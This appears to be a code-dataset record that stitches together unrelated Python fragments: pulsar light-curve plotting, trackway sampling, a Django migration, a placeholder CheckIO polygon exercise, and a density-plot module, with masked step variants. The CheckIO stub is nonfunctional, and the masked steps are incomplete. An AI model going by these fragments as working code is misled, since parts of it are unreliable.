trackways with fewer\n # points than a specified size\n maxWindowSize = min(8, int(0.5*float(bundle.count)))\n windowSizes = [1, 2, 4, 6, 8]\n while maxWindowSize < windowSizes[-1]:\n windowSizes.pop()\n\n samples = []\n\n for i in windowSizes:\n # For each valid window size create a sample entry\n samples.append({'size':i + 1, 'values':self._sampleTrackway(trackway, i + 1) })\n\n self._plotTrackwaySamples(trackway, samples)\n 
self._drawTrackwaySamples(sitemap, samples)\n\n self.trackwayDirectionData[trackway.uid] = {'trackway':trackway, 'samples':samples}\n\n#_______________________________________________________________________________\n def _drawTrackwaySamples(self, sitemap, samples):\n \"\"\"_drawTrackwaySamples doc...\"\"\"\n\n drawing = sitemap.cache.get('drawing')\n\n for sample in samples:\n color = self.COLORS[samples.index(sample)]\n\n if len(sample['values']) < 2:\n continue\n\n prev = sample['values'][0].position\n\n for value in sample['values'][1:]:\n pos = value.position\n drawing.line(\n prev.toMayaTuple(), pos.toMayaTuple(),\n stroke=color, stroke_width=1, stroke_opacity='0.75')\n prev = pos\n\n for value in sample['values']:\n pos = value.position\n drawing.circle(\n pos.toMayaTuple(), 5,\n stroke='none', fill=color, fill_opacity='0.75')\n\n#_______________________________________________________________________________\n def _plotTrackwaySamples(self, trackway, samples):\n \"\"\"_plotTrackwaySamples doc...\"\"\"\n\n bundle = self.owner.getSeriesBundle(trackway)\n\n plot = MultiScatterPlot(\n title='%s Direction Sampling %s' % (trackway.name, bundle.echoStatus(asPercent=True)),\n xLabel='Trackway Curve Position (m)',\n yLabel='Direction (degrees)')\n\n for sample in samples:\n color = self.COLORS[samples.index(sample)]\n data = []\n\n for value in sample['values']:\n data.append(value.curvePoint)\n\n plot.addPlotSeries(data=data, color=color, line=True)\n\n self._paths.append(plot.save(self.getTempFilePath(extension='pdf')))\n\n#_______________________________________________________________________________\n def _sampleTrackway(self, trackway, windowSize):\n \"\"\"\n Samples the trackway and returns result\n @type trackway: * \"\"\"\n\n window = []\n samples = []\n\n entries = self.trackHeadingData[trackway.uid]['entries']\n analysisTrackway = trackway.getAnalysisPair(self.analysisSession)\n\n for entry in entries:\n # For each track entry in the trackways data add that to the sample window and update\n # the samples result\n\n window.append(entry)\n\n if len(window) < windowSize:\n # Don't create a sample until the sub-sample list exceeds the sample window size\n continue\n\n xTests = [] # X spatial position values\n yTests = [] # Y spatial position values\n angleTests = [] # Heading angle values\n curvePosTests = [] # Curve position values\n for item in window:\n # Calculate weighted averages for various properties of the current sample window\n\n angle = item.headingAngle\n angleTests.append(angle.valueDegrees)\n\n # Create a ValueUncertainty for the curve position by using the fractional\n # positional uncertainty over the spatial length of the curve\n posValue = item.track.positionValue\n posUnc = math.sqrt(posValue.xUnc**2 + posValue.yUnc**2)\n curvePos = item.track.getAnalysisPair(self.analysisSession).curvePosition\n curvePosUnc = abs(posUnc/analysisTrackway.curveLength)\n curvePosTests.append(NumericUtils.toValueUncertainty(curvePos, curvePosUnc))\n\n pv = item.track.positionValue\n xTests.append(pv.xValue)\n yTests.append(pv.yValue)\n\n directionAngleMean = NumericUtils.weightedAverage(*angleTests)\n curvePositionMean = NumericUtils.weightedAverage(*curvePosTests)\n xValue = NumericUtils.weightedAverage(*xTests)\n yValue = NumericUtils.weightedAverage(*yTests)\n position = PositionValue2D(\n x=xValue.raw, xUnc=xValue.rawUncertainty,\n y=yValue.raw, yUnc=yValue.rawUncertainty)\n\n # Remove the oldest sample from the to make room for a new sample in the next iteration\n 
window.pop(0)\n\n if len(samples) > 0:\n # Compare this sample to the previous one and if it does not differ\n # significantly then continue to continue to the next iteration\n last = samples[-1].directionAngle\n totalUnc = last.rawUncertainty + directionAngleMean.rawUncertainty\n deviation = abs(directionAngleMean.raw - last.raw)/totalUnc\n if deviation < 2.0:\n continue\n\n samples.append(self.SAMPLE_DATA_NT(\n directionAngle=directionAngleMean,\n position=position,\n curvePoint=(\n curvePositionMean.value, directionAngleMean.value,\n curvePositionMean.uncertainty, directionAngleMean.uncertainty),\n curvePosition=curvePositionMean,\n track=entry.track ))\n\n self._extendSamplesToTrackwayStart(entries[0], samples)\n self._extendSampleToTrackwayEnd(entries[-1], samples)\n return samples\n\n#_______________________________________________________________________________\n def _extendSamplesToTrackwayStart(self, firstEntry, samples):\n \"\"\"_extendSamplesToTrackwayStart doc...\"\"\"\n\n if len(samples) < 2 or samples[0].track == firstEntry.track:\n # If there aren't enough samples, or the samples already extend to the end of the\n # trackway, return the samples without adding on an end point\n return\n\n line = LineSegment2D(\n start=samples[0].position.clone(),\n end=samples[1].position.clone())\n\n firstTrack = firstEntry.track\n analysisTrack = firstTrack.getAnalysisPair(self.analysisSession)\n position = line.closestPointOnLine(firstTrack.positionValue, False)\n\n samples.insert(0, self.SAMPLE_DATA_NT(\n directionAngle=samples[0].directionAngle.clone(),\n position=position,\n curvePoint=(\n analysisTrack.curvePosition, samples[0].directionAngle.value,\n 0, samples[-1].directionAngle.uncertainty),\n curvePosition=samples[0].curvePosition.clone(),\n track=firstTrack ))\n\n#_______________________________________________________________________________\n def _extendSampleToTrackwayEnd(self, lastEntry, samples):\n\n if len(samples) < 2 or samples[-1].track == lastEntry.track:\n # If there aren't enough samples, or the samples already extend to the end of the\n # trackway, return the samples without adding on an end point\n return\n\n line = LineSegment2D(\n start=samples[-2].position.clone(),\n end=samples[-1].position.clone())\n\n lastTrack = lastEntry.track\n analysisTrack = lastTrack.getAnalysisPair(self.analysisSession)\n position = line.closestPointOnLine(lastTrack.positionValue, False)\n\n ha = samples[-1].directionAngle.clone()\n samples.append(self.SAMPLE_DATA_NT(\n directionAngle=ha,\n position=position,\n curvePoint=(analysisTrack.curvePosition, ha.value, 0, ha.uncertainty),\n curvePosition=samples[-1].curvePosition.clone(),\n track=lastTrack ))\n\n#_______________________________________________________________________________\n def _postAnalyze(self):\n self.mergePdfs(self._paths, 'Trackway-Direction.pdf')\n",
"step-ids": [
7,
9,
11,
13,
17
]
}
|
[
7,
9,
11,
13,
17
] |
#!/usr/bin/env python
from LCClass import LightCurve
import matplotlib.pyplot as plt
import niutils
def main():
lc1821 = LightCurve("PSR_B1821-24/PSR_B1821-24_combined.evt")
lc0218 = LightCurve("PSR_J0218+4232/PSR_J0218+4232_combined.evt")
fig, ax = plt.subplots(2, 1, figsize=(8, 8))
ax[0], _ = lc1821.fit_two('lorentzian', ax=ax[0], label=False, annotate=False)
ax[1], _ = lc0218.fit_two('gaussian', ax=ax[1], label=False, annotate=False)
ax[1].set_xlabel("Pulse Phase", fontsize=25)
ax[0].text(.08, .95, r'PSR B1821$-$24', ha='left', va='top',
fontsize=20, transform=ax[0].transAxes,
bbox=dict(facecolor='white', edgecolor='none', alpha=0.6))
ax[1].text(.08, .95, r'PSR J0218$+$4232', ha='left', va='top',
fontsize=20, transform=ax[1].transAxes,
bbox=dict(facecolor='white', edgecolor='none', alpha=0.6))
ax[0].tick_params(labelbottom=False)
#plt.setp(ax[0].get_yticklabels()[0], visible=False)
fig.text(.04, .5, r'Photon Counts', ha='center', va='center',
rotation='vertical', fontsize=25)
plt.subplots_adjust(hspace=0, bottom=.08, top=.94, right=.98, left=.15)
fig.savefig("poster_plot.svg")
if __name__ == '__main__':
main()
|
normal
|
{
"blob_id": "48311ee17a3f2eca8db32d7672f540fa45a7a900",
"index": 3524,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n lc1821 = LightCurve('PSR_B1821-24/PSR_B1821-24_combined.evt')\n lc0218 = LightCurve('PSR_J0218+4232/PSR_J0218+4232_combined.evt')\n fig, ax = plt.subplots(2, 1, figsize=(8, 8))\n ax[0], _ = lc1821.fit_two('lorentzian', ax=ax[0], label=False, annotate\n =False)\n ax[1], _ = lc0218.fit_two('gaussian', ax=ax[1], label=False, annotate=False\n )\n ax[1].set_xlabel('Pulse Phase', fontsize=25)\n ax[0].text(0.08, 0.95, 'PSR B1821$-$24', ha='left', va='top', fontsize=\n 20, transform=ax[0].transAxes, bbox=dict(facecolor='white',\n edgecolor='none', alpha=0.6))\n ax[1].text(0.08, 0.95, 'PSR J0218$+$4232', ha='left', va='top',\n fontsize=20, transform=ax[1].transAxes, bbox=dict(facecolor='white',\n edgecolor='none', alpha=0.6))\n ax[0].tick_params(labelbottom=False)\n fig.text(0.04, 0.5, 'Photon Counts', ha='center', va='center', rotation\n ='vertical', fontsize=25)\n plt.subplots_adjust(hspace=0, bottom=0.08, top=0.94, right=0.98, left=0.15)\n fig.savefig('poster_plot.svg')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef main():\n lc1821 = LightCurve('PSR_B1821-24/PSR_B1821-24_combined.evt')\n lc0218 = LightCurve('PSR_J0218+4232/PSR_J0218+4232_combined.evt')\n fig, ax = plt.subplots(2, 1, figsize=(8, 8))\n ax[0], _ = lc1821.fit_two('lorentzian', ax=ax[0], label=False, annotate\n =False)\n ax[1], _ = lc0218.fit_two('gaussian', ax=ax[1], label=False, annotate=False\n )\n ax[1].set_xlabel('Pulse Phase', fontsize=25)\n ax[0].text(0.08, 0.95, 'PSR B1821$-$24', ha='left', va='top', fontsize=\n 20, transform=ax[0].transAxes, bbox=dict(facecolor='white',\n edgecolor='none', alpha=0.6))\n ax[1].text(0.08, 0.95, 'PSR J0218$+$4232', ha='left', va='top',\n fontsize=20, transform=ax[1].transAxes, bbox=dict(facecolor='white',\n edgecolor='none', alpha=0.6))\n ax[0].tick_params(labelbottom=False)\n fig.text(0.04, 0.5, 'Photon Counts', ha='center', va='center', rotation\n ='vertical', fontsize=25)\n plt.subplots_adjust(hspace=0, bottom=0.08, top=0.94, right=0.98, left=0.15)\n fig.savefig('poster_plot.svg')\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "from LCClass import LightCurve\nimport matplotlib.pyplot as plt\nimport niutils\n\n\ndef main():\n lc1821 = LightCurve('PSR_B1821-24/PSR_B1821-24_combined.evt')\n lc0218 = LightCurve('PSR_J0218+4232/PSR_J0218+4232_combined.evt')\n fig, ax = plt.subplots(2, 1, figsize=(8, 8))\n ax[0], _ = lc1821.fit_two('lorentzian', ax=ax[0], label=False, annotate\n =False)\n ax[1], _ = lc0218.fit_two('gaussian', ax=ax[1], label=False, annotate=False\n )\n ax[1].set_xlabel('Pulse Phase', fontsize=25)\n ax[0].text(0.08, 0.95, 'PSR B1821$-$24', ha='left', va='top', fontsize=\n 20, transform=ax[0].transAxes, bbox=dict(facecolor='white',\n edgecolor='none', alpha=0.6))\n ax[1].text(0.08, 0.95, 'PSR J0218$+$4232', ha='left', va='top',\n fontsize=20, transform=ax[1].transAxes, bbox=dict(facecolor='white',\n edgecolor='none', alpha=0.6))\n ax[0].tick_params(labelbottom=False)\n fig.text(0.04, 0.5, 'Photon Counts', ha='center', va='center', rotation\n ='vertical', fontsize=25)\n plt.subplots_adjust(hspace=0, bottom=0.08, top=0.94, right=0.98, left=0.15)\n fig.savefig('poster_plot.svg')\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "#!/usr/bin/env python\n\nfrom LCClass import LightCurve\nimport matplotlib.pyplot as plt\nimport niutils\n\ndef main():\n lc1821 = LightCurve(\"PSR_B1821-24/PSR_B1821-24_combined.evt\")\n lc0218 = LightCurve(\"PSR_J0218+4232/PSR_J0218+4232_combined.evt\")\n\n fig, ax = plt.subplots(2, 1, figsize=(8, 8))\n\n ax[0], _ = lc1821.fit_two('lorentzian', ax=ax[0], label=False, annotate=False)\n ax[1], _ = lc0218.fit_two('gaussian', ax=ax[1], label=False, annotate=False)\n\n ax[1].set_xlabel(\"Pulse Phase\", fontsize=25)\n ax[0].text(.08, .95, r'PSR B1821$-$24', ha='left', va='top', \n fontsize=20, transform=ax[0].transAxes,\n bbox=dict(facecolor='white', edgecolor='none', alpha=0.6))\n ax[1].text(.08, .95, r'PSR J0218$+$4232', ha='left', va='top', \n fontsize=20, transform=ax[1].transAxes,\n bbox=dict(facecolor='white', edgecolor='none', alpha=0.6))\n\n ax[0].tick_params(labelbottom=False)\n #plt.setp(ax[0].get_yticklabels()[0], visible=False)\n \n fig.text(.04, .5, r'Photon Counts', ha='center', va='center',\n rotation='vertical', fontsize=25)\n\n plt.subplots_adjust(hspace=0, bottom=.08, top=.94, right=.98, left=.15)\n\n fig.savefig(\"poster_plot.svg\")\n\n\n\nif __name__ == '__main__':\n main()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# Generated by Django 3.2 on 2021-06-28 04:32
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('rrhh', '0014_alter_detallepermiso_fecha_permiso'),
]
operations = [
migrations.AlterField(
model_name='permiso',
name='mes',
field=models.CharField(choices=[('01', 'ENERO'), ('02', 'FEBRERO'), ('03', 'MARZO'), ('04', 'ABRIL'), ('05', 'MAYO'), ('06', 'JUNIO'), ('07', 'JULIO'), ('08', 'AGOSTO'), ('09', 'SEPTIEMBRE'), ('10', 'OCTUBRE'), ('11', 'NOVIEMBRE'), ('12', 'DICIEMBRE')], max_length=2),
),
]
|
normal
|
{
"blob_id": "5db450424dc143443839e24801ece444d0d7e162",
"index": 3611,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('rrhh', '0014_alter_detallepermiso_fecha_permiso')]\n operations = [migrations.AlterField(model_name='permiso', name='mes',\n field=models.CharField(choices=[('01', 'ENERO'), ('02', 'FEBRERO'),\n ('03', 'MARZO'), ('04', 'ABRIL'), ('05', 'MAYO'), ('06', 'JUNIO'),\n ('07', 'JULIO'), ('08', 'AGOSTO'), ('09', 'SEPTIEMBRE'), ('10',\n 'OCTUBRE'), ('11', 'NOVIEMBRE'), ('12', 'DICIEMBRE')], max_length=2))]\n",
"step-4": "from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('rrhh', '0014_alter_detallepermiso_fecha_permiso')]\n operations = [migrations.AlterField(model_name='permiso', name='mes',\n field=models.CharField(choices=[('01', 'ENERO'), ('02', 'FEBRERO'),\n ('03', 'MARZO'), ('04', 'ABRIL'), ('05', 'MAYO'), ('06', 'JUNIO'),\n ('07', 'JULIO'), ('08', 'AGOSTO'), ('09', 'SEPTIEMBRE'), ('10',\n 'OCTUBRE'), ('11', 'NOVIEMBRE'), ('12', 'DICIEMBRE')], max_length=2))]\n",
"step-5": "# Generated by Django 3.2 on 2021-06-28 04:32\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('rrhh', '0014_alter_detallepermiso_fecha_permiso'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='permiso',\n name='mes',\n field=models.CharField(choices=[('01', 'ENERO'), ('02', 'FEBRERO'), ('03', 'MARZO'), ('04', 'ABRIL'), ('05', 'MAYO'), ('06', 'JUNIO'), ('07', 'JULIO'), ('08', 'AGOSTO'), ('09', 'SEPTIEMBRE'), ('10', 'OCTUBRE'), ('11', 'NOVIEMBRE'), ('12', 'DICIEMBRE')], max_length=2),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#!/home/porosya/.local/share/virtualenvs/checkio-VEsvC6M1/bin/checkio --domain=py run inside-block
# https://py.checkio.org/mission/inside-block/
# When it comes to city planning it's important to understand the borders of various city structures. Parks, lakes or living blocks can be represented as a closed polygon and can be described using Cartesian coordinates on a map. We need functionality to determine whether a point (a building or a tree) lies inside the structure.
#
# For the purpose of this mission, a city structure may be considered a polygon represented as a sequence of vertex coordinates on a plane or map. The vertices are connected sequentially with the last vertex in the list connecting to the first. We are given the coordinates of the point which we need to check. If the point of impact lies on the edge of the polygon then it should be considered inside it. For this mission, you need to determine whether the given point lies inside the polygon.
#
#
# END_DESC
def is_inside(polygon, point):
    px, py = point
    inside = False
    for (x1, y1), (x2, y2) in zip(polygon, polygon[1:] + polygon[:1]):
        # a point lying on an edge counts as inside
        if ((x2 - x1) * (py - y1) == (y2 - y1) * (px - x1)
                and min(x1, x2) <= px <= max(x1, x2) and min(y1, y2) <= py <= max(y1, y2)):
            return True
        # ray casting: toggle on every edge crossed by a ray running towards +x
        if (y1 > py) != (y2 > py) and px < x1 + (py - y1) * (x2 - x1) / (y2 - y1):
            inside = not inside
    return inside
if __name__ == '__main__':
assert is_inside(((1, 1), (1, 3), (3, 3), (3, 1)),
(2, 2)) == True, "First"
assert is_inside(((1, 1), (1, 3), (3, 3), (3, 1)),
(4, 2)) == False, "Second"
assert is_inside(((1, 1), (4, 1), (2, 3)),
(3, 2)) == True, "Third"
assert is_inside(((1, 1), (4, 1), (1, 3)),
(3, 3)) == False, "Fourth"
assert is_inside(((2, 1), (4, 1), (5, 3), (3, 4), (1, 3)),
(4, 3)) == True, "Fifth"
assert is_inside(((2, 1), (4, 1), (3, 2), (3, 4), (1, 3)),
(4, 3)) == False, "Sixth"
assert is_inside(((1, 1), (3, 2), (5, 1), (4, 3), (5, 5), (3, 4), (1, 5), (2, 3)),
(3, 3)) == True, "Seventh"
assert is_inside(((1, 1), (1, 5), (5, 5), (5, 4), (2, 4), (2, 2), (5, 2), (5, 1)),
(4, 3)) == False, "Eighth"
|
normal
|
{
"blob_id": "548c4dbfc1456fead75c22927ae7c6224fafeace",
"index": 7893,
"step-1": "<mask token>\n",
"step-2": "def is_inside(polygon, point):\n return True or False\n\n\n<mask token>\n",
"step-3": "def is_inside(polygon, point):\n return True or False\n\n\nif __name__ == '__main__':\n assert is_inside(((1, 1), (1, 3), (3, 3), (3, 1)), (2, 2)) == True, 'First'\n assert is_inside(((1, 1), (1, 3), (3, 3), (3, 1)), (4, 2)\n ) == False, 'Second'\n assert is_inside(((1, 1), (4, 1), (2, 3)), (3, 2)) == True, 'Third'\n assert is_inside(((1, 1), (4, 1), (1, 3)), (3, 3)) == False, 'Fourth'\n assert is_inside(((2, 1), (4, 1), (5, 3), (3, 4), (1, 3)), (4, 3)\n ) == True, 'Fifth'\n assert is_inside(((2, 1), (4, 1), (3, 2), (3, 4), (1, 3)), (4, 3)\n ) == False, 'Sixth'\n assert is_inside(((1, 1), (3, 2), (5, 1), (4, 3), (5, 5), (3, 4), (1, 5\n ), (2, 3)), (3, 3)) == True, 'Seventh'\n assert is_inside(((1, 1), (1, 5), (5, 5), (5, 4), (2, 4), (2, 2), (5, 2\n ), (5, 1)), (4, 3)) == False, 'Eighth'\n",
"step-4": "#!/home/porosya/.local/share/virtualenvs/checkio-VEsvC6M1/bin/checkio --domain=py run inside-block\n\n# https://py.checkio.org/mission/inside-block/\n\n# When it comes to city planning it's import to understand the borders of various city structures. Parks, lakes or living blocks can be represented as closed polygon and can be described using cartesian coordinates on a map . We need functionality to determine is a point (a building or a tree) lies inside the structure.\n# \n# For the purpose of this mission, a city structure may be considered a polygon represented as a sequence of vertex coordinates on a plane or map. The vertices are connected sequentially with the last vertex in the list connecting to the first. We are given the coordinates of the point which we need to check. If the point of impact lies on the edge of the polygon then it should be considered inside it. For this mission, you need to determine whether the given point lies inside the polygon.\n# \n# \n# END_DESC\n\ndef is_inside(polygon, point):\n return True or False\n\n\nif __name__ == '__main__':\n assert is_inside(((1, 1), (1, 3), (3, 3), (3, 1)),\n (2, 2)) == True, \"First\"\n assert is_inside(((1, 1), (1, 3), (3, 3), (3, 1)),\n (4, 2)) == False, \"Second\"\n assert is_inside(((1, 1), (4, 1), (2, 3)),\n (3, 2)) == True, \"Third\"\n assert is_inside(((1, 1), (4, 1), (1, 3)),\n (3, 3)) == False, \"Fourth\"\n assert is_inside(((2, 1), (4, 1), (5, 3), (3, 4), (1, 3)),\n (4, 3)) == True, \"Fifth\"\n assert is_inside(((2, 1), (4, 1), (3, 2), (3, 4), (1, 3)),\n (4, 3)) == False, \"Sixth\"\n assert is_inside(((1, 1), (3, 2), (5, 1), (4, 3), (5, 5), (3, 4), (1, 5), (2, 3)),\n (3, 3)) == True, \"Seventh\"\n assert is_inside(((1, 1), (1, 5), (5, 5), (5, 4), (2, 4), (2, 2), (5, 2), (5, 1)),\n (4, 3)) == False, \"Eighth\"",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
"""
Kernel density estimation plots for geochemical data.
"""
import copy
import matplotlib.pyplot as plt
import numpy as np
from matplotlib.ticker import MaxNLocator
from ...comp.codata import close
from ...util.log import Handle
from ...util.meta import get_additional_params, subkwargs
from ...util.plot.axes import add_colorbar, init_axes
from ...util.plot.density import (
get_axis_density_methods,
percentile_contour_values_from_meshz,
plot_Z_percentiles,
)
from ...util.plot.style import DEFAULT_CONT_COLORMAP
from .grid import DensityGrid
from .ternary import ternary_heatmap
logger = Handle(__name__)
def density(
arr,
ax=None,
logx=False,
logy=False,
bins=25,
mode="density",
extent=None,
contours=[],
percentiles=True,
relim=True,
cmap=DEFAULT_CONT_COLORMAP,
shading="auto",
vmin=0.0,
colorbar=False,
**kwargs
):
"""
    Creates a diagrammatic representation of data density and/or frequency for either
binary diagrams (X-Y) or ternary plots.
Additional arguments are typically forwarded
to respective :mod:`matplotlib` functions
:func:`~matplotlib.pyplot.pcolormesh`,
:func:`~matplotlib.pyplot.hist2d`,
:func:`~matplotlib.pyplot.hexbin`,
:func:`~matplotlib.pyplot.contour`, and
:func:`~matplotlib.pyplot.contourf` (see Other Parameters, below).
Parameters
----------
arr : :class:`numpy.ndarray`
        Array from which to draw data.
ax : :class:`matplotlib.axes.Axes`, `None`
The subplot to draw on.
logx : :class:`bool`, `False`
Whether to use a logspaced *grid* on the x axis. Values strictly >0 required.
logy : :class:`bool`, `False`
Whether to use a logspaced *grid* on the y axis. Values strictly >0 required.
bins : :class:`int`, 20
Number of bins used in the gridded functions (histograms, KDE evaluation grid).
mode : :class:`str`, 'density'
Different modes used here: ['density', 'hexbin', 'hist2d']
extent : :class:`list`
        Predetermined extent of the grid from which to form the histogram/KDE. In the
general form (xmin, xmax, ymin, ymax).
contours : :class:`list`
Contours to add to the plot, where :code:`mode='density'` is used.
percentiles : :class:`bool`, `True`
Whether contours specified are to be converted to percentiles.
relim : :class:`bool`, :code:`True`
Whether to relimit the plot based on xmin, xmax values.
cmap : :class:`matplotlib.colors.Colormap`
Colormap for mapping surfaces.
vmin : :class:`float`, 0.
Minimum value for colormap.
shading : :class:`str`, 'auto'
Shading to apply to pcolormesh.
colorbar : :class:`bool`, False
Whether to append a linked colorbar to the generated mappable image.
{otherparams}
Returns
-------
:class:`matplotlib.axes.Axes`
Axes on which the densityplot is plotted.
.. seealso::
Functions:
:func:`matplotlib.pyplot.pcolormesh`
:func:`matplotlib.pyplot.hist2d`
:func:`matplotlib.pyplot.contourf`
Notes
-----
The default density estimates and derived contours are generated based on
kernel density estimates. Assumptions around e.g. 95% of points lying within
a 95% contour won't necessarily be valid for non-normally distributed data
(instead, this represents the approximate 95% percentile on the kernel
    density estimate). Note that contours are currently only generated for
    `mode="density"`; future updates may allow the use of a histogram
basis, which would give results closer to 95% data percentiles.
Todo
----
* Allow generation of contours from histogram data, rather than just
the kernel density estimate.
* Implement an option and filter to 'scatter' points below the minimum threshold
or maximum percentile contours.
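    Examples
    --------
    A minimal illustrative sketch (synthetic data; the argument values here are
    arbitrary and purely for demonstration):
    >>> import numpy as np
    >>> xy = np.random.lognormal(size=(500, 2))  # binary (X-Y) data
    >>> ax = density(xy, bins=30, logx=True, logy=True)
    >>> ax = density(xy, mode="hist2d", bins=30, colorbar=True)
    >>> ax = density(xy, contours=[0.5, 0.95])  # percentile contours on the KDE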
"""
if (mode == "density") & np.isclose(vmin, 0.0): # if vmin is not specified
vmin = 0.02 # 2% max height | 98th percentile
if arr.shape[-1] == 3:
projection = "ternary"
else:
projection = None
ax = init_axes(ax=ax, projection=projection, **kwargs)
pcolor, contour, contourf = get_axis_density_methods(ax)
background_color = (*ax.patch.get_facecolor()[:-1], 0.0)
if cmap is not None:
if isinstance(cmap, str):
cmap = plt.get_cmap(cmap)
cmap = copy.copy(cmap) # without this, it would modify the global cmap
cmap.set_under((1, 1, 1, 0))
if mode == "density":
cbarlabel = "Kernel Density Estimate"
else:
cbarlabel = "Frequency"
valid_rows = np.isfinite(arr).all(axis=-1)
if (mode in ["hexbin", "hist2d"]) and contours:
raise NotImplementedError(
"Contours are not currently implemented for 'hexbin' or 'hist2d' modes."
)
if (arr.size > 0) and valid_rows.any():
# Data can't be plotted if there's any nans, so we can exclude these
arr = arr[valid_rows]
if projection is None: # binary
x, y = arr.T
grid = DensityGrid(
x,
y,
bins=bins,
logx=logx,
logy=logy,
extent=extent,
**subkwargs(kwargs, DensityGrid)
)
if mode == "hexbin":
# extent values are exponents (i.e. 3 -> 10**3)
mappable = ax.hexbin(
x,
y,
gridsize=bins,
cmap=cmap,
extent=grid.get_hex_extent(),
xscale=["linear", "log"][logx],
yscale=["linear", "log"][logy],
**subkwargs(kwargs, ax.hexbin)
)
elif mode == "hist2d":
_, _, _, im = ax.hist2d(
x,
y,
bins=[grid.grid_xe, grid.grid_ye],
range=grid.get_range(),
cmap=cmap,
cmin=[0, 1][vmin > 0],
**subkwargs(kwargs, ax.hist2d)
)
mappable = im
elif mode == "density":
zei = grid.kdefrom(
arr,
xtransform=[lambda x: x, np.log][logx],
ytransform=[lambda y: y, np.log][logy],
mode="edges",
**subkwargs(kwargs, grid.kdefrom)
)
if percentiles: # 98th percentile
vmin = percentile_contour_values_from_meshz(zei, [1.0 - vmin])[1][0]
logger.debug(
"Updating `vmin` to percentile equiv: {:.2f}".format(vmin)
)
if not contours:
# pcolormesh using bin edges
mappable = pcolor(
grid.grid_xei,
grid.grid_yei,
zei,
cmap=cmap,
vmin=vmin,
shading=shading,
**subkwargs(kwargs, pcolor)
)
mappable.set_edgecolor(background_color)
mappable.set_linestyle("None")
mappable.set_lw(0.0)
else:
mappable = _add_contours(
grid.grid_xei,
grid.grid_yei,
zi=zei.reshape(grid.grid_xei.shape),
ax=ax,
contours=contours,
percentiles=percentiles,
cmap=cmap,
vmin=vmin,
**kwargs
)
if relim and (extent is not None):
ax.axis(extent)
elif projection == "ternary": # ternary
if shading == "auto":
                shading = "flat"  # 'auto' can't be passed to tripcolor
# zeros make nans in this case, due to the heatmap calculations
arr[~(arr > 0).all(axis=1), :] = np.nan
arr = close(arr)
if mode == "hexbin":
raise NotImplementedError
# density, histogram etc parsed here
coords, zi, _ = ternary_heatmap(arr, bins=bins, mode=mode)
if percentiles: # 98th percentile
vmin = percentile_contour_values_from_meshz(zi, [1.0 - vmin])[1][0]
logger.debug("Updating `vmin` to percentile equiv: {:.2f}".format(vmin))
# remove coords where H==0, as ax.tripcolor can't deal with variable alpha :'(
fltr = (zi != 0) & (zi >= vmin)
coords = coords[fltr.flatten(), :]
zi = zi[fltr]
if not contours:
tri_poly_collection = pcolor(
*coords.T,
zi.flatten(),
cmap=cmap,
vmin=vmin,
shading=shading,
**subkwargs(kwargs, pcolor)
)
mappable = tri_poly_collection
else:
mappable = _add_contours(
*coords.T,
zi=zi.flatten(),
ax=ax,
contours=contours,
percentiles=percentiles,
cmap=cmap,
vmin=vmin,
**kwargs
)
ax.set_aspect("equal")
else:
        if arr.ndim not in [0, 1, 2]:
raise NotImplementedError
if colorbar:
cbkwargs = kwargs.copy()
cbkwargs["label"] = cbarlabel
add_colorbar(mappable, **cbkwargs)
return ax
def _add_contours(
*coords,
zi=None,
ax=None,
contours=[],
cmap=DEFAULT_CONT_COLORMAP,
vmin=0.0,
extent=None,
**kwargs
):
"""
Add density-based contours to a plot.
"""
# get the contour levels
percentiles = kwargs.pop("percentiles", True)
levels = contours or kwargs.get("levels", None)
pcolor, contour, contourf = get_axis_density_methods(ax)
if percentiles and not isinstance(levels, int):
# plot individual percentile contours
_cs = plot_Z_percentiles(
*coords,
zi=zi,
ax=ax,
percentiles=levels,
extent=extent,
cmap=cmap,
**kwargs
)
mappable = _cs
else:
# plot interval contours
if levels is None:
levels = MaxNLocator(nbins=10).tick_values(zi.min(), zi.max())
elif isinstance(levels, int):
levels = MaxNLocator(nbins=levels).tick_values(zi.min(), zi.max())
else:
raise NotImplementedError
# filled contours
mappable = contourf(
*coords, zi, extent=extent, levels=levels, cmap=cmap, vmin=vmin, **kwargs
)
# contours
contour(
*coords, zi, extent=extent, levels=levels, cmap=cmap, vmin=vmin, **kwargs
)
return mappable
_add_additional_parameters = True
density.__doc__ = density.__doc__.format(
otherparams=[
"",
get_additional_params(
density,
plt.pcolormesh,
plt.hist2d,
plt.hexbin,
plt.contour,
plt.contourf,
header="Other Parameters",
indent=4,
subsections=True,
),
][_add_additional_parameters]
)
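# --- Usage sketch (illustrative addition, not part of the original module) ---
# A minimal, hedged example of how density() might be called on a binary (X-Y)
# dataset; the synthetic data, bin count and contour levels are arbitrary
# assumptions chosen purely for demonstration.
if __name__ == "__main__":
    import numpy as np
    import matplotlib.pyplot as plt
    demo_xy = np.random.multivariate_normal(
        [0.0, 0.0], [[1.0, 0.5], [0.5, 1.0]], size=500
    )  # 500 correlated bivariate-normal samples
    demo_ax = density(demo_xy, bins=40, mode="density", contours=[0.5, 0.95])
    demo_ax.set(xlabel="X", ylabel="Y")
    plt.show()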
|
normal
|
{
"blob_id": "ae475dc95c6a099270cf65d4b471b4b430f02303",
"index": 8840,
"step-1": "<mask token>\n",
